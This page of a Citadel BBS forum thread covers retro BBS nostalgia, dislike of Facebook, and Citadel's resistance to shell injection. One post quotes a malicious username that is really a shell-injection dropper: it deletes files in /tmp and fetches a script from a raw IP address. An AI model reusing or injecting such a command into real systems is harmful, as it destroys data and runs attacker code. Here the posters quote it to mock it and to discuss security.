Language:
switch to room list switch to menu My folders
Go to page: 1 2 3 4 5 [6] 7 8
[#] Tue Nov 06 2018 12:26:57 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

Needless to say, you should get them all to come here. BBS's are the new vinyl. Retro is cool again.

[#] Wed Nov 07 2018 09:26:41 EST from fleeb <>

[Reply] [ReplyQuoted] [Headers] [Print]


I prefer the textual interface, even (by connecting via ssh to bbs@uncensored.citadel.org).
It has all the benefits of the text interface with none of the dialing-a-modem drawbacks!

[#] Fri Nov 09 2018 07:28:58 EST from CrazyEddy <>

[Reply] [ReplyQuoted] [Headers] [Print]

Needless to say, you should get them all to come here. BBS's are the
new vinyl. Retro is cool again.

Yeah, I've got it near the top of the list of "other bbs's to call". The basic problem is that of the 150+ people on the facebook group, few want to go back to the old days and I've only had three signups so far.

[#] Mon Nov 12 2018 14:52:39 EST from fleeb <>

[Reply] [ReplyQuoted] [Headers] [Print]


That's probably normal.

I think most people prefer GUI clients, etc. Although, this Citadel has a GUI interface as well, so... eh...

[#] Mon Nov 12 2018 17:00:50 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

That tends to be a problem everywhere; there are still too many people who consider Facebook to be "one BBS to rule them all" even though being on fb is about as pleasant as having your spleen torn out by a rabid forklift.

[#] Thu Nov 15 2018 16:09:23 EST from CrazyEddy <>

[Reply] [ReplyQuoted] [Headers] [Print]

You know, I've been thinking about these issues since the 80's I think. As a child I was being moved around so often that the only viable way for me to keep in contact with family and friends was through telecommunication but the reality is that a
number of things stand in the way of about half of those people using the actual technology.

Sometimes it's lack of resources such as time, money, training, etc, sometimes it's blind technophobia. Other times it's justifiable technophobia I think. People are rightly scared of new technologies due to the bad things that have happened to
people who stray from the beaten track. This is what's taken out the former BBS people I think. The cost isn't necessarily worth the benefit.

[#] Mon Nov 19 2018 12:12:14 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

And yet some people "get it". You're here. All of the regulars are here.
All of us see the value of spending some time in smaller venues. I love my BBS pals. When I occasionally stray onto the big socials I inevitably find them revolting almost immediately.

[#] Mon Nov 19 2018 12:57:25 EST from wizard of aahz

[Reply] [ReplyQuoted] [Headers] [Print]

Facebook is revolting?? And the people are pissed off too?

[#] Mon Nov 19 2018 15:12:59 EST from Freakdog

[Reply] [ReplyQuoted] [Headers] [Print]

 

Mon Nov 19 2018 12:57:25 EST from wizard of aahz
Facebook is revolting?? And the people are pissed off too? 

"They stink on ice.



[#] Mon Nov 19 2018 15:34:59 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

Facebook is revolting?? And the people are pissed off too?

Classic gag ... except it doesn't work here because I really did mean revolting as in repulsive.

[#] Tue Nov 27 2018 09:48:26 EST from fleeb <>

[Reply] [ReplyQuoted] [Headers] [Print]


Virtual pitchforks...

[#] Fri Jan 04 2019 16:45:10 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]


If you look in the full user list, you'll see we have a user named

cd /tmp; rm -rf *; wget -q http://185.61.138.177/gtop.sh; chmod

Heh. Heh heh. As if *that* kind of shell injection attack could possibly work against MY MIGHTY C PROGRAMS.

[#] Mon Jan 07 2019 17:27:25 EST from CrazyEddy

[Reply] [ReplyQuoted] [Headers] [Print]

I noticed that user too. I'd imagine that it would be designed to work under
obscure circumstances. Perhaps with a script that uses sendcommand.

[#] Mon Jan 07 2019 19:49:48 EST from zooer

[Reply] [ReplyQuoted] [Headers] [Print]

Is someone going to download the script and see what it does?

 



[#] Tue Jan 08 2019 10:05:33 EST from fleeb

[Reply] [ReplyQuoted] [Headers] [Print]


I tried to download it, but that URL doesn't work.

[#] Wed Jan 09 2019 06:06:28 EST from CrazyEddy

[Reply] [ReplyQuoted] [Headers] [Print]

Yeah, I don't think I've ever once seen the URL "work".

Also, I must ask, what is the party line on secure code in Citadel? I'm
thinking of providing shell access to the Hack The Box network as a BBS and I'd
rather not create a new VM.

[#] Thu Jan 10 2019 14:04:36 EST from IGnatius T Foobar

[Reply] [ReplyQuoted] [Headers] [Print]

No one can ever claim that their software is 100% secure, but I would say Citadel is Pretty Damn Secure in this area, particularly because it's all lovingly hand-coded in C and is immune to shell injection attacks like the one above, because we simply don't use the shell for much anymore. Back in the days of UUCP and Doors we did, but those days are long gone.

Little Bobby Tables doesn't live here. (But the lunatic with the box of uncooked macaroni ... he's always hiding around the next corner.)

[#] Fri Jan 11 2019 00:53:56 EST from CrazyEddy

[Reply] [ReplyQuoted] [Headers] [Print]

C programs are however susceptible to other coding errors like buffer overflows
and memory corruption.

Are you familiar with Hack The Box? It's one of those network security labs
designed for people to break into the servers. Whatever I put there is likely
to be exposed to fire.

[#] Fri Jan 11 2019 09:56:17 EST from fleeb

[Reply] [ReplyQuoted] [Headers] [Print]


C is particularly difficult to get right, with regards to buffer overflow attacks.

It would be nice to see if Citadel can handle such attacks, just to find any problems.

[#] Fri Jan 18 2019 23:37:15 EST from isoroku

[Reply] [ReplyQuoted] [Headers] [Print]

Can Citadel be configured to be compiled with clang? If so, you could try using clang-address-sanitizer or clang-static-analyzer.

Go to page: 1 2 3 4 5 [6] 7 8